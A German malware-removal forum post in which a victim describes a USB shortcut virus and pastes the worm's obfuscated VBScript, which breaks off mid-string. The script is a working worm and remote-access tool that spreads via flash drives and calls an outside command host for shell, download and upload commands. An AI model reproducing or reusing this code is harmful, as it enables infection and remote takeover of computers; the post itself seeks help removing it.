Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Flash Drive Shortcut Virus wtbchkxbde..vbs

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 12.04.2014, 00:50   #1
fxak
 
Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Hallo Trojaner-Board
Ich bin gerade auf Praxissemester im Regenwald von Papua Neuguinea und habe hier sehr schlechtes aber trotzdem ziemlich teures Internet. Ich bitte also um Verständnis dass ich nicht im Voraus irgendwelche Programme heruntergeladen und Logfiles erstellt habe, werde dies aber machen wenn ihr es für nötig haltet, ich würde aber darum bitten immer an die Bandbreite-schonendste Möglichkeit zu denken und mir evtl einen Link dazu zu posten, jedes Kilobyte ist bares Geld
Falls es die Lösung für mein Problem hier schon irgendwo gibt wäre ein kurzer Hinweis nett.

Ich benutze Windows 7 64 bit auf einem Acer Aspire Laptop

Habe einem Dorfbewohner hier meinen USB-Stick gegeben und dann ohne nachzudenken darauf zugegriffen. Alle Dateien wurden versteckt und durch Verknüpfungen ersetzt. Außerdem befindet sich eine Datei namens "wtbchkxbde..vbs" auf dem Stick, Erstelldatum 22.9.13, Größe 72 kB (wobei auf dem Stick nach dem Formatieren 90 mB belegt sind, keine Ahnung ob das normal ist)

Die .vbs enthält folgenden Text:

Code:
ATTFilter
mfvasRGZIhZnddvphsOW="112$@133$@164$@105$@187$@174$@172$@184$@173$@174$@187$@105$@131$@105$@177$@184$@190$@173$@178$@183$@178$@105$@113$@172$@114$@105$@188$@180$@194$@185$@174$@105$@131$@105$@177$@184$@190$@173$@178$@183$@178$@118$@175$@193$@105$@166$@135$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@172$@184$@183$@175$@178$@176$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@86$@83$@177$@184$@188$@189$@105$@134$@105$@107$@171$@187$@184$@192$@188$@174$@187$@185$@187$@184$@189$@174$@172$@189$@119$@177$@184$@185$@189$@184$@119$@184$@187$@176$@107$@86$@83$@185$@184$@187$@189$@105$@134$@105$@129$@123$@127$@129$@86$@83$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@134$@105$@107$@110$@170$@185$@185$@173$@170$@189$@170$@110$@107$@86$@83$@181$@183$@180$@175$@178$@181$@174$@105$@134$@105$@189$@187$@190$@174$@86$@83$@181$@183$@180$@175$@184$@181$@173$@174$@187$@105$@134$@105$@189$@187$@190$@174$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@185$@190$@171$@181$@178$@172$@105$@191$@170$@187$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@86$@83$@173$@178$@182$@105$@188$@177$@174$@181$@181$@184$@171$@179$@105$@86$@83$@188$@174$@189$@105$@188$@177$@174$@181$@181$@184$@171$@179$@105$@134$@105$@192$@188$@172$@187$@178$@185$@189$@119$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@192$@188$@172$@187$@178$@185$@189$@119$@188$@177$@174$@181$@181$@107$@114$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@86$@83$@188$@174$@189$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@173$@178$@182$@105$@177$@189$@189$@185$@184$@171$@179$@86$@83$@188$@174$@189$@105$@177$@189$@189$@185$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@185$@187$@178$@191$@170$@189$@105$@191$@170$@187$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@86$@83$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@134$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@183$@170$@182$@174$@86$@83$@188$@189$@170$@187$@189$@190$@185$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@188$@185$@174$@172$@178$@170$@181$@175$@184$@181$@173$@174$@187$@188$@105$@113$@107$@188$@189$@170$@187$@189$@190$@185$@107$@114$@105$@111$@105$@107$@165$@107$@86$@83$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@114$@105$@111$@105$@107$@165$@107$@86$@83$@178$@175$@105$@183$@184$@189$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@175$@184$@181$@173$@174$@187$@174$@193$@178$@188$@189$@188$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@114$@105$@189$@177$@174$@183$@105$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@189$@174$@182$@185$@110$@107$@114$@105$@111$@105$@107$@165$@107$@86$@83$@188$@185$@181$@178$@189$@174$@187$@105$@134$@105$@107$@133$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@135$@107$@86$@83$@188$@181$@174$@174$@185$@105$@134$@105$@126$@121$@121$@121$@105$@86$@83$@173$@178$@182$@105$@187$@174$@188$@185$@184$@183$@188$@174$@86$@83$@173$@178$@182$@105$@172$@182$@173$@86$@83$@173$@178$@182$@105$@185$@170$@187$@170$@182$@86$@83$@178$@183$@175$@184$@105$@134$@105$@107$@107$@86$@83$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@107$@86$@83$@188$@189$@170$@187$@189$@173$@170$@189$@174$@105$@134$@105$@107$@107$@86$@83$@173$@178$@182$@105$@184$@183$@174$@184$@183$@172$@174$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@172$@184$@173$@174$@105$@188$@189$@170$@187$@189$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@86$@83$@178$@183$@188$@189$@170$@183$@172$@174$@86$@83$@192$@177$@178$@181$@174$@105$@189$@187$@190$@174$@86$@83$@86$@83$@178$@183$@188$@189$@170$@181$@181$@86$@83$@86$@83$@187$@174$@188$@185$@184$@183$@188$@174$@105$@134$@105$@107$@107$@86$@83$@187$@174$@188$@185$@184$@183$@188$@174$@105$@134$@105$@185$@184$@188$@189$@105$@113$@107$@178$@188$@118$@187$@174$@170$@173$@194$@107$@117$@107$@107$@114$@86$@83$@172$@182$@173$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@187$@174$@188$@185$@184$@183$@188$@174$@117$@188$@185$@181$@178$@189$@174$@187$@114$@86$@83$@188$@174$@181$@174$@172$@189$@105$@172$@170$@188$@174$@105$@172$@182$@173$@105$@113$@121$@114$@86$@83$@172$@170$@188$@174$@105$@107$@174$@193$@172$@174$@172$@190$@189$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@174$@193$@174$@172$@190$@189$@174$@105$@185$@170$@187$@170$@182$@86$@83$@172$@170$@188$@174$@105$@107$@190$@185$@173$@170$@189$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@184$@183$@174$@184$@183$@172$@174$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@174$@189$@105$@184$@183$@174$@184$@183$@172$@174$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@184$@185$@174$@183$@189$@174$@193$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@123$@117$@105$@175$@170$@181$@188$@174$@114$@86$@83$@105$@105$@105$@105$@105$@105$@184$@183$@174$@184$@183$@172$@174$@119$@192$@187$@178$@189$@174$@105$@185$@170$@187$@170$@182$@86$@83$@105$@105$@105$@105$@105$@105$@184$@183$@174$@184$@183$@172$@174$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@86$@83$@105$@105$@105$@105$@105$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@105$@86$@83$@172$@170$@188$@174$@105$@107$@190$@183$@178$@183$@188$@189$@170$@181$@181$@107$@86$@83$@105$@105$@105$@105$@105$@105$@190$@183$@178$@183$@188$@189$@170$@181$@181$@86$@83$@172$@170$@188$@174$@105$@107$@188$@174$@183$@173$@107$@86$@83$@105$@105$@105$@105$@105$@105$@173$@184$@192$@183$@181$@184$@170$@173$@105$@172$@182$@173$@105$@113$@122$@114$@117$@172$@182$@173$@105$@113$@123$@114$@86$@83$@172$@170$@188$@174$@105$@107$@188$@178$@189$@174$@118$@188$@174$@183$@173$@107$@86$@83$@105$@105$@105$@105$@105$@105$@188$@178$@189$@174$@173$@184$@192$@183$@181$@184$@170$@173$@174$@187$@105$@172$@182$@173$@105$@113$@122$@114$@117$@172$@182$@173$@105$@113$@123$@114$@86$@83$@172$@170$@188$@174$@105$@107$@187$@174$@172$@191$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@190$@185$@181$@184$@170$@173$@105$@113$@185$@170$@187$@170$@182$@114$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@183$@190$@182$@118$@173$@187$@178$@191$@174$@187$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@174$@183$@190$@182$@118$@173$@187$@178$@191$@174$@187$@107$@117$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@183$@190$@182$@118$@175$@170$@175$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@174$@183$@190$@182$@118$@175$@170$@175$@107$@117$@174$@183$@190$@182$@175$@170$@175$@105$@113$@185$@170$@187$@170$@182$@114$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@183$@190$@182$@118$@185$@187$@184$@172$@174$@188$@188$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@174$@183$@190$@182$@118$@185$@187$@184$@172$@174$@188$@188$@107$@117$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@105$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@172$@182$@173$@118$@188$@177$@174$@181$@181$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@172$@182$@173$@118$@188$@177$@174$@181$@181$@107$@117$@172$@182$@173$@188$@177$@174$@181$@181$@105$@113$@185$@170$@187$@170$@182$@114$@105$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@173$@174$@181$@174$@189$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@173$@174$@181$@174$@189$@174$@175$@170$@175$@105$@113$@185$@170$@187$@170$@182$@114$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@193$@178$@189$@118$@185$@187$@184$@172$@174$@188$@188$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@185$@187$@184$@172$@174$@188$@188$@105$@113$@185$@170$@187$@170$@182$@114$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@188$@181$@174$@174$@185$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@188$@181$@174$@174$@185$@105$@134$@105$@174$@191$@170$@181$@105$@113$@185$@170$@187$@170$@182$@114$@105$@105$@105$@105$@105$@105$@105$@105$@86$@83$@174$@183$@173$@105$@188$@174$@181$@174$@172$@189$@86$@83$@86$@83$@192$@188$@172$@187$@178$@185$@189$@119$@188$@181$@174$@174$@185$@105$@188$@181$@174$@174$@185$@86$@83$@86$@83$@192$@174$@183$@173$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@178$@183$@188$@189$@170$@181$@181$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@173$@178$@182$@105$@181$@183$@180$@184$@171$@179$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@173$@178$@182$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@178$@172$@184$@183$@86$@83$@173$@178$@182$@105$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@86$@83$@86$@83$@190$@185$@188$@189$@170$@187$@189$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@173$@187$@178$@191$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@187$@178$@191$@174$@188$@86$@83$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@178$@188$@187$@174$@170$@173$@194$@105$@134$@105$@189$@187$@190$@174$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@175$@187$@174$@174$@188$@185$@170$@172$@174$@105$@105$@135$@105$@121$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@173$@187$@178$@191$@174$@189$@194$@185$@174$@105$@105$@134$@105$@122$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@105$@117$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@189$@187$@190$@174$@86$@83$@105$@105$@105$@105$@178$@175$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@123$@116$@125$@86$@83$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@175$@178$@181$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@114$@119$@143$@178$@181$@174$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@183$@184$@189$@105$@181$@183$@180$@175$@178$@181$@174$@105$@189$@177$@174$@183$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@105$@113$@190$@171$@184$@190$@183$@173$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@114$@114$@114$@105$@133$@135$@105$@107$@181$@183$@180$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@123$@116$@125$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@190$@172$@170$@188$@174$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@114$@105$@133$@135$@105$@190$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@183$@170$@182$@174$@105$@134$@105$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@188$@174$@189$@105$@181$@183$@180$@184$@171$@179$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@172$@187$@174$@170$@189$@174$@188$@177$@184$@187$@189$@172$@190$@189$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@105$@113$@121$@114$@105$@111$@105$@107$@119$@181$@183$@180$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@178$@183$@173$@184$@192$@188$@189$@194$@181$@174$@105$@134$@105$@128$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@189$@170$@187$@176$@174$@189$@185$@170$@189$@177$@105$@134$@105$@107$@172$@182$@173$@119$@174$@193$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@184$@187$@180$@178$@183$@176$@173$@178$@187$@174$@172$@189$@184$@187$@194$@105$@134$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@170$@187$@176$@190$@182$@174$@183$@189$@188$@105$@134$@105$@107$@120$@172$@105$@188$@189$@170$@187$@189$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@105$@107$@111$@188$@189$@170$@187$@189$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@107$@111$@174$@193$@178$@189$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@178$@172$@184$@183$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@172$@181$@170$@188$@188$@174$@188$@165$@107$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@172$@181$@170$@188$@188$@174$@188$@165$@119$@107$@105$@111$@105$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@113$@190$@171$@184$@190$@183$@173$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@114$@114$@111$@105$@107$@165$@107$@114$@105$@111$@105$@107$@165$@173$@174$@175$@170$@190$@181$@189$@178$@172$@184$@183$@165$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@178$@181$@174$@178$@172$@184$@183$@117$@107$@117$@107$@114$@105$@134$@105$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@178$@181$@174$@119$@185$@170$@189$@177$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@178$@181$@174$@178$@172$@184$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@188$@170$@191$@174$@113$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@175$@184$@181$@173$@174$@187$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@114$@119$@188$@190$@171$@175$@184$@181$@173$@174$@187$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@183$@184$@189$@105$@181$@183$@180$@175$@184$@181$@173$@174$@187$@105$@189$@177$@174$@183$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@123$@116$@125$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@105$@134$@105$@175$@184$@181$@173$@174$@187$@119$@183$@170$@182$@174$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@188$@174$@189$@105$@181$@183$@180$@184$@171$@179$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@172$@187$@174$@170$@189$@174$@188$@177$@184$@187$@189$@172$@190$@189$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@105$@111$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@105$@111$@105$@107$@119$@181$@183$@180$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@178$@183$@173$@184$@192$@188$@189$@194$@181$@174$@105$@134$@105$@128$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@189$@170$@187$@176$@174$@189$@185$@170$@189$@177$@105$@134$@105$@107$@172$@182$@173$@119$@174$@193$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@184$@187$@180$@178$@183$@176$@173$@178$@187$@174$@172$@189$@184$@187$@194$@105$@134$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@170$@187$@176$@190$@182$@174$@183$@189$@188$@105$@134$@105$@107$@120$@172$@105$@188$@189$@170$@187$@189$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@105$@107$@111$@188$@189$@170$@187$@189$@105$@174$@193$@185$@181$@184$@187$@174$@187$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@175$@184$@181$@173$@174$@187$@119$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@